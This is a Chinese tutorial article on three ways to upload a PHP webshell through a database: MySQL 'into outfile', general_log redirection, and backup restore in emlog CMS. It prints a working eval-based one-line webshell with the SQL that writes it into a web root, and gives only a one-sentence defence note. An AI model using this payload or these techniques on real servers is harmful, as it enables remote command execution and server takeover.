數(shù)據(jù)庫上傳WebShell的方式有哪些

這篇文章主要介紹“數(shù)據(jù)庫上傳WebShell的方式有哪些”，在日常操作中，相信很多人在數(shù)據(jù)庫上傳WebShell的方式有哪些問題上存在疑惑，小編查閱了各式資料，整理出簡單好用的操作方法，希望對大家解答”數(shù)據(jù)庫上傳WebShell的方式有哪些”的疑惑有所幫助！接下來，請跟著小編一起來學(xué)習(xí)吧！

一、什么是WebShell？

簡單的說來，webshell就是一個(gè)asp或php木馬后門，黑客在入侵了一個(gè)網(wǎng)站后，常常在將這些asp或php木馬后門文件放置在網(wǎng)站服務(wù)器的web目錄中，與正常的網(wǎng)頁文件混在一起。然后黑客就可以用web的方式，通過asp或php木馬后門控制網(wǎng)站服務(wù)器，包括上傳下載文件、查看數(shù)據(jù)庫、執(zhí)行任意程序命令等。

為了更好理解WebShell我們學(xué)習(xí)兩個(gè)概念：

什么是“木馬”？

“木馬”全稱是“特洛伊木馬(Trojan Horse)”，原指古希臘士兵藏在木馬內(nèi)進(jìn)入敵方城市從而占領(lǐng)敵方城市的故事。

在Internet上，“特洛伊木馬”指一些程序設(shè)計(jì)人員在其可從網(wǎng)絡(luò)上下載 (Download)的應(yīng)用程序或游戲中，包含了可以控制用戶的計(jì)算機(jī)系統(tǒng)的程序，可能造成用戶的系統(tǒng)被破壞甚至癱瘓。

什么是后門？

大家都知道，一臺計(jì)算機(jī)上有65535個(gè)端口，那么如果把計(jì)算機(jī)看作是一間屋子，那么這65535個(gè)端口就可以它看做是計(jì)算機(jī)為了與外界連接所開的65535 扇門。每個(gè)門的背后都是一個(gè)服務(wù)。有的門是主人特地打開迎接客人的（提供服務(wù)），有的門是主人為了出去訪問客人而開設(shè)的（訪問遠(yuǎn)程服務(wù)）——理論上，剩下的其他門都該是關(guān)閉著的，但偏偏由于各種原因，很多門都是開啟的。于是就有好事者進(jìn)入，主人的隱私被刺探，生活被打擾，甚至屋里的東西也被搞得一片狼跡。這扇悄然被開啟的門——就是“后門”。

webshell的優(yōu)點(diǎn)

webshell 最大的優(yōu)點(diǎn)就是可以穿越防火墻，由于與被控制的服務(wù)器或遠(yuǎn)程主機(jī)交換的數(shù)據(jù)都是通過80端口傳遞的，因此不會(huì)被防火墻攔截。并且使用webshell一般不會(huì)在系統(tǒng)日志中留下記錄，只會(huì)在網(wǎng)站的web日志中留下一些數(shù)據(jù)提交記錄，沒有經(jīng)驗(yàn)的管理員是很難看出入侵痕跡的。

二、WebShell的分類

根據(jù)文件大小分類：大馬和小馬(通常指的是一句話木馬，能夠使用菜刀這類工具去直接連接它) 

根據(jù)腳本名稱分類：jsp、asp、aspx、php

小馬的功能比較單一，大馬的功能比較豐富，集成上傳下載、數(shù)據(jù)庫提權(quán)、CMD命令操作、克隆、代理等功能，如下圖所示。

三、利用數(shù)據(jù)庫上傳WebShell的三種方式

（1）into out file寫入

數(shù)據(jù)庫中secure_file_priv支持web目錄文件導(dǎo)出、數(shù)據(jù)庫用戶File權(quán)限、獲取物理路徑；該參數(shù)有三種狀態(tài)：

secure_file_priv=NULL;

表示寫入開關(guān)關(guān)閉；

secure_file_priv="";

表示寫入開關(guān)打開，且可以寫入任意目錄；

secure_file_priv="C:/phpStudy/PHPTutorial/WWW";

表示寫入開關(guān)打開，且寫入到指定的路徑下，如果寫入路徑不是Web路徑，也無法使用該功能寫入WehShell。

該開關(guān)無法通過SQL命令

set global secure_file_priv="C:/phpStudy/PHPTutorial/WWW"

參數(shù)打開開關(guān)，僅能通過修改mysql.ini配置文件修改，局限性比較大。

如果開關(guān)已經(jīng)打開，正確寫入WebShell的SQL語句如下：

select "<?php @eval($_POST['cmd']);?>" into outfile "C://phpStudy//PHPTutorial//WWW//shell.php"

然后利用此菜刀、蟻劍或者冰蝎鏈接即可

（2）通過general_log日志寫入

可以通過修改日志開關(guān)即可上傳webshell，該方式需要數(shù)據(jù)庫root權(quán)限即可，通過SQL語句即可打開general_log開關(guān)并設(shè)置日志位置（需要提前知道Web的根路徑位置）；

修改完畢后，通過

select "<?php @eval($_POST['cmd']);?>"

即可寫入WebShell，寫入后的php文件內(nèi)容如下圖所示

（3）通過備份數(shù)據(jù)庫漏洞寫入

數(shù)據(jù)庫備份為大多數(shù)CMS后臺管理頁面必備的功能，但是如果后臺校驗(yàn)不嚴(yán)格，容易通過恢復(fù)備份方式上傳WebShell，以下以emlog的CMS講，測試版本5.3.0

 3.1查看web路徑地址

直接在管理頁面，點(diǎn)擊更多信息

在出來的phpinfo頁面搜索document_root即可

3.2 先備份數(shù)據(jù)庫

利用管理頁面的數(shù)據(jù)庫備份功能先備份數(shù)據(jù)庫

3.3修改備份文件內(nèi)容

打開備份的SQL文件，在最后語句之前添加以下SQL語句

通過into outfile寫入webshell；最后通過菜刀鏈接即可。

四、如何防御WebShell？

數(shù)據(jù)庫應(yīng)用應(yīng)做好安全加固，不該開的開關(guān)盡量不要打開；同時(shí)做好數(shù)據(jù)庫備份和回復(fù)的后臺校驗(yàn)工作，平時(shí)做好日常安全防護(hù)。

到此，關(guān)于“數(shù)據(jù)庫上傳WebShell的方式有哪些”的學(xué)習(xí)就結(jié)束了，希望能夠解決大家的疑惑。理論與實(shí)踐的搭配能更好的幫助大家學(xué)習(xí)，快去試試吧！若想繼續(xù)學(xué)習(xí)更多相關(guān)知識，請繼續(xù)關(guān)注億速云網(wǎng)站，小編會(huì)繼續(xù)努力為大家?guī)砀鄬?shí)用的文章！